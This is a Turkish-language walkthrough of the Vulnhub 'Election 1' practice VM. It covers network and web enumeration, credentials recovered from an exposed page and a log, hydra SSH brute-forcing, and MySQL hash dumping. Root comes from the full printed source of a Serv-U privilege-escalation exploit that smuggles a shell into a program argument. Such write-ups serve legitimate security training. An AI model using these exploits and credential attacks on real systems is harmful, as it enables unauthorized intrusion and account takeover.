Makine Hakkında Bilgiler
Açıklama:
It is an OSCP-like VM, Medium Level difficulty.
Vulnhub Sayfası:
https://www.vulnhub.com/entry/election-1,503/
İndirme Sayfası:
https://download.vulnhub.com/election/election.7z
Walkthrough
Makineyi tespit ederek başlayalım.
┌──(root💀kali)-[~/oscp/love]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:3d:df:6c, IPv4: 192.168.6.129
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.6.1 00:50:56:c0:00:08 VMware, Inc.
192.168.6.2 00:50:56:f3:da:b0 VMware, Inc.
192.168.6.128 00:0c:29:d8:37:b9 VMware, Inc.
192.168.6.254 00:50:56:f0:28:2f VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.980 seconds (129.29 hosts/sec). 4 responded
┌──(root💀kali)-[~/oscp/love]
└─# ifconfig eth0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.6.129 netmask 255.255.255.0 broadcast 192.168.6.255
inet6 fe80::20c:29ff:fe3d:df6c prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:3d:df:6c txqueuelen 1000 (Ethernet)
RX packets 3496 bytes 5010015 (4.7 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1519 bytes 96802 (94.5 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
nmap taraması ile devam edelim.
('[*] Scan:', 2)
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-07 18:50 EDT
Nmap scan report for 192.168.6.128
Host is up (0.00067s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 20:d1:ed:84:cc:68:a5:a7:86:f0:da:b8:92:3f:d9:67 (RSA)
| 256 78:89:b3:a2:75:12:76:92:2a:f9:8d:27:c1:08:a7:b9 (ECDSA)
|_ 256 b8:f4:d6:61:cf:16:90:c5:07:18:99:b0:7c:70:fd:c0 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 00:0C:29:D8:37:B9 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.67 ms 192.168.6.128
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.23 seconds
80'de çalışan http'ye odaklandım. gobuster taramalarım sonucunda aşağıdaki sonuçları elde ettim.
┌──(root💀kali)-[~/oscp/love]
└─# gobuster dir --add-slash --expanded --follow-redirect --status-codes-blacklist "404" -t 50 -w /usr/share/wordlists/dirb/big.txt --url http://192.168.6.128/election/ --extensions php,py,log,txt,sql,bak,html,conf
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.6.128/election/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: sql,bak,html,conf,php,py,log,txt
[+] Add Slash: true
[+] Follow Redirect: true
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2021/07/07 18:51:28 Starting gobuster in directory enumeration mode
===============================================================
http://192.168.6.128/election/.htaccess.txt (Status: 403) [Size: 278]
http://192.168.6.128/election/.htaccess.bak (Status: 403) [Size: 278]
http://192.168.6.128/election/.htaccess.py (Status: 403) [Size: 278]
http://192.168.6.128/election/.htaccess/ (Status: 403) [Size: 278]
http://192.168.6.128/election/.htpasswd.bak (Status: 403) [Size: 278]
http://192.168.6.128/election/.htpasswd.html (Status: 403) [Size: 278]
http://192.168.6.128/election/.htpasswd/ (Status: 403) [Size: 278]
http://192.168.6.128/election/.htpasswd.py (Status: 403) [Size: 278]
http://192.168.6.128/election/.htpasswd.sql (Status: 403) [Size: 278]
http://192.168.6.128/election/.htpasswd.conf (Status: 403) [Size: 278]
http://192.168.6.128/election/.htpasswd.php (Status: 403) [Size: 278]
http://192.168.6.128/election/.htpasswd.log (Status: 403) [Size: 278]
http://192.168.6.128/election/.htpasswd.txt (Status: 403) [Size: 278]
http://192.168.6.128/election/.htaccess.sql (Status: 403) [Size: 278]
http://192.168.6.128/election/.htaccess.html (Status: 403) [Size: 278]
http://192.168.6.128/election/.htaccess.conf (Status: 403) [Size: 278]
http://192.168.6.128/election/.htaccess.php (Status: 403) [Size: 278]
http://192.168.6.128/election/.htaccess.log (Status: 403) [Size: 278]
http://192.168.6.128/election/admin/ (Status: 200) [Size: 8964]
http://192.168.6.128/election/card.php (Status: 200) [Size: 1935]
http://192.168.6.128/election/data/ (Status: 200) [Size: 765]
http://192.168.6.128/election/index.php (Status: 200) [Size: 7003]
http://192.168.6.128/election/js/ (Status: 200) [Size: 988]
http://192.168.6.128/election/languages/ (Status: 200) [Size: 1364]
http://192.168.6.128/election/lib/ (Status: 200) [Size: 966]
http://192.168.6.128/election/media/ (Status: 200) [Size: 1753]
http://192.168.6.128/election/themes/ (Status: 200) [Size: 963]
===============================================================
2021/07/07 18:51:42 Finished
===============================================================
http://192.168.6.128/election/card.php sayfasına gittiğimde binary formatta datalar vardı. BU verileri 2 kere text'e dönüştürdüğümde aşağıdaki bilgileri elde ettim.
user:1234
pass:Zxc123!@#
BU bilgilerle http://192.168.6.128/election/admin/ adresindeli login ekranından başarılı bir şekilde giriş yaptım. İçeride dolandıktan sonra http://192.168.6.128/election/admin/pengaturan.php?_ sayfasındaki System Info altında logları indirebileceğim bir buton vardı. Aşağıdaki dosyaya ulaştım.
[2020-01-01 00:00:00] Assigned Password for the user love: P@$$w0rd@123
[2020-04-03 00:13:53] Love added candidate 'Love'.
[2020-04-08 19:26:34] Love has been logged in from Unknown IP on Firefox (Linux).
[2021-07-08 00:03:11] Love has been logged in from Unknown IP on Firefox (Linux).
[2021-07-08 00:56:20] Love has been logged in from Unknown IP on Firefox (Linux).
[2021-07-08 01:03:09] Love changed homepage theme to shards.
[2021-07-08 03:09:43] Love has been logged in from Unknown IP on Firefox (Linux).
Elimdeki user'lar ve password'ler ile ssh için hydra aracını başlattım.
┌──(root💀kali)-[~/oscp/love]
└─# cat users
admin1
love
Love
1234
┌──(root💀kali)-[~/oscp/love]
└─# cat passwords
Zxc123!@#
P@$$w0rd@123
┌──(root💀kali)-[~/oscp/love]
└─# hydra -L users -P passwords ssh://192.168.6.128
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-07 18:52:47
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 8 tasks per 1 server, overall 8 tasks, 8 login tries (l:4/p:2), ~1 try per task
[DATA] attacking ssh://192.168.6.128:22/
[22][ssh] host: 192.168.6.128 login: love password: P@$$w0rd@123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-07 18:52:50
ssh ile bağlandım ve ilk flagi aldım.
love@election:~$ cd Desktop/
love@election:~/Desktop$ ls
user.txt
love@election:~/Desktop$ cat user.txt
cd38ac698c0d793a5236d01003f692b0
Bunun üzerine kullanıcıyla araştırmalar yapmaya başladım. Notlarım aşağıdaki gibi...
--
[*] usr010 Is current user in an administrative group?..................... yes!
---
adm:x:4:syslog,love
---
9 timers listed.
---
================================================================( network )=====
[*] net000 Services listening only on localhost............................ yes!
---
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:43958 0.0.0.0:*
tcp LISTEN 0 5 127.0.0.1:631 0.0.0.0:*
---
[!] net010 Can we sniff traffic with tcpdump?.............................. nope
love@election:/var/www/html/election/admin/inc$ cat conn.php
<?php
error_reporting(0);
session_start();
$db_host = "localhost";
$db_user = "newuser";
$db_pass = "password";
$db_name = "election";
$connection = mysqli_connect($db_host,$db_user,$db_pass,$db_name);
if(!$connection){
echo "FATAL ERROR!";
exit();
}
?>
love@election:/var/www/html/election/admin/inc$ mysql -u newuser -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 7
Server version: 10.1.44-MariaDB-0ubuntu0.18.04.1 Ubuntu 18.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
...
MariaDB [mysql]> select User, Password from user;
+---------+-------------------------------------------+
| User | Password |
+---------+-------------------------------------------+
| root | *9CFBBC772F3F6C106020035386DA5BBBF1249A11(toor) |
| newuser | *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 |
+---------+-------------------------------------------+
[-] SUID files:
-rwsr-xr-x 1 root root 6319088 Nov 29 2017 /usr/local/Serv-U/Serv-U
Notlarım üzerinden giderken tek işime yarayan suid biti oldu.
┌──(root💀kali)-[~/tools/CVE-2020-8635]
└─# searchsploit Serv-U Local Privilege
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
RhinoSoft Serv-U FTP Server 3.x < 5.x - Local Privilege Escalation | windows/local/381.c
Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit) | linux/local/47072.rb
Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1) | linux/local/47009.c
Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (2) | multiple/local/47173.sh
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
┌──(root💀kali)-[~/tools/CVE-2020-8635]
└─# cp $(locate linux/local/47009.c) .
Uzun bir süre geçtikten sonra sıra bu exploiti kullanmaya gelmişti.
love@election:/tmp$ wget http://192.168.6.129:1111/47009.c
--2021-07-08 03:05:03-- http://192.168.6.129:1111/47009.c
Connecting to 192.168.6.129:1111... connected.
HTTP request sent, awaiting response... 200 OK
Length: 619 [text/x-csrc]
Saving to: ‘47009.c’
47009.c 100%[=================================================================================================>] 619 --.-KB/s in 0s
2021-07-08 03:05:03 (87.0 MB/s) - ‘47009.c’ saved [619/619]
love@election:/tmp$
love@election:/tmp$
love@election:/tmp$
love@election:/tmp$
love@election:/tmp$ head -n 30 47009.c
/*
CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation
vulnerability found by:
Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.dev
to compile and run:
gcc servu-pe-cve-2019-12181.c -o pe && ./pe
*/
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
int main()
{
char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};
int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);
// if execv is successful, we won't reach here
printf("ret val: %d errno: %d\n", ret_val, errno);
return errno;
}love@election:/tmp$ mv 47009.c servu-pe-cve-2019-12181.c
love@election:/tmp$ gcc servu-pe-cve-2019-12181.c -o pe && ./pe
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare),1000(love)
opening root shell
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare),1000(love)
# cd /root
# ls
root.txt
# cat root.txt
5238feefc4ffe09645d97e9ee49bc3a6
Kendime not: Suid bitlerle alakalı exploit arıyorsan Local Priv anahtar kelimelerinide kullanmayı unutma.
İlk Yorumu Siz Yapın